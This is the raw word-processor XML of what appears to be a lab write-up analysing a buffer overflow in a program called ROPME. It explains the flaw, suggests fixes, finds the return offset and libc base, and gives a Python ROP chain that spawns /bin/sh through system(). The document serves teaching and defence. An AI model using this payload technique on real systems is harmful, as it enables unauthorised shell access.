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E0C6" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t># ROPME Buffer Overflow Attack Analysis Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4B7FD" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="41033742" w14:textId="32C65E19" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>1. Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336BAA5B" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="4473348F" w14:textId="13274116" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r>
        <w:t>Identified Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D645D8" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="12B42114" w14:textId="62B98954" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The program contains a stack buffer overflow vulnerability in the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function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0A046" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="0DFFEA1D" w14:textId="71421947" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC5198D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">    char </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>overflowme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>32];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7206D8" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>read(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>overflowme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 0x200);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D7765" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C62D8" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="37E8CB44" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The vulnerability exists because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CABE86" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- The buffer size is only 32 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FC1E2F" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- The read function can accept up to 0x200 (512) bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E9C29" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- No bounds checking is performed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C599561" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="73C484D3" w14:textId="2206AA1A" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> How to Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552883A5" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>To fix this vulnerability, several approaches could be taken:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F277D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>1. Use bounded input functions like `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)` instead of `read()`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAA9206" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>2. Add buffer size checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B098B7" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>3. Enable stack canaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF8897" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>4. Implement input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287AFBF" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="47E1D287" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="2A6DF047" w14:textId="64D4843C" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>2. Finding Return Address Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7AEFB" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="79F0C632" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The offset to the return address was determined through the following stack layout analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F06566" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- Buffer size: 32 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356ECFD9" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- Saved RBP: 8 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772890D8" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- Return address: 8 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49A694" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- Total offset: 40 bytes (32 + 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26885C33" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="5845E199" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>This was verified through controlled buffer overflow testing using pattern generation and crash analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC98F4" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="4F736070" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="0EB49179" w14:textId="184789B9" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">3. Finding </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Base Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D97B6" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="15F20945" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> base address can be calculated using the leaked </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setvbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A61FB" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">1. Program provides </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setvbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address: `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address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setvbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> : %16p\n", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setvbuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>);`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036D795C" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>2. Calculate base address: `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc_base</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setvbuf_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setvbuf_offset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D5611E" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">3. Verification through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and runtime analysis confirms the calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB7EB3" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="11786960" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30385D1A" w14:textId="536F53B4" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. ROP Chain Construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5875E3" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="45AF79F1" w14:textId="30C78642" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gadget Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E5E6FE" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>Required gadgets for the exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DB9350" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">- `pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ret` at 0x4012a3 (for function argument setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF3344" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>- `ret` gadget for stack alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674E6AF4" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="4669F5C5" w14:textId="3A6BA681" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="ko-KR"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ROP Chain Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A066C51" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>1. Overflow buffer with 40 bytes of padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137652E5" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>2. Use ret gadget for stack alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56CB25" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">3. Use pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gadget to load /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> string address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC2DDF" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">4. Call </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) with /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F389F46" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">5. Clean exit using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A43236A" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="1CB24AF7" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The complete chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF294B5" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>```python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3FDFB0" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' * 40                # Buffer overflow padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75270D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">RET)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">            # Stack alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567D578" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(POP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">RDI)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        # pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B753BD5" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>binsh_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     # /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8508B0" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    # system() call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB0528" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(POP_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">RDI)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">        # pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ; ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F1925F" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(0)                 # exit status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E88FAE2" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>payload += p64(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exit_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">      # exit() call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180DAF08" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60009434" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="42681391" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="114287FA" w14:textId="6BAC0C7D" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>5. Clean Program Termination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406749AD" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="5582531B" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The exploit ensures clean program termination by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BB03CF" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">1. Properly aligning the stack before </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388DDD3D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t xml:space="preserve">2. Using </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) instead of letting the program crash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356D3A1D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>3. Maintaining proper stack frame integrity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B32EB" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="57BD26AE" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>This approach prevents crashes and ensures the program exits gracefully after shell access is obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E81BBBA" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="033CD89D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="220B923C" w14:textId="3F4989EB" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>6. Testing and Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5BC19" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="5E3DDCAD" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>The exploit was tested in a controlled environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647D1A3" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>1. Initial offset verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C420634" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>2. Address leak confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF49DE7" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>3. ROP chain execution testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A9CC8" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>4. Shell access verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D73C7" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>5. Clean exit confirmation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F924D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="2FEC7B4D" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>All test cases demonstrated successful exploitation while maintaining system stability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42FEF5" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="6DC3B825" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="0B3BC982" w14:textId="73D5D7C6" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>7. Security Implications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE452A" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="2BA013EE" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>This vulnerability demonstrates the importance of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372969BA" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>1. Proper input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9DD5C" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>2. Buffer size management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3DF5A1" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>3. Modern security protections (NX, ASLR, canaries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D04E7D9" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
        <w:t>4. Secure coding practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F38D1" w14:textId="77777777" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73"/>
    <w:p w14:paraId="64735A41" w14:textId="087C4EF8" w:rsidR="00E40F73" w:rsidRDefault="00E40F73" w:rsidP="00E40F73">
      <w:r>
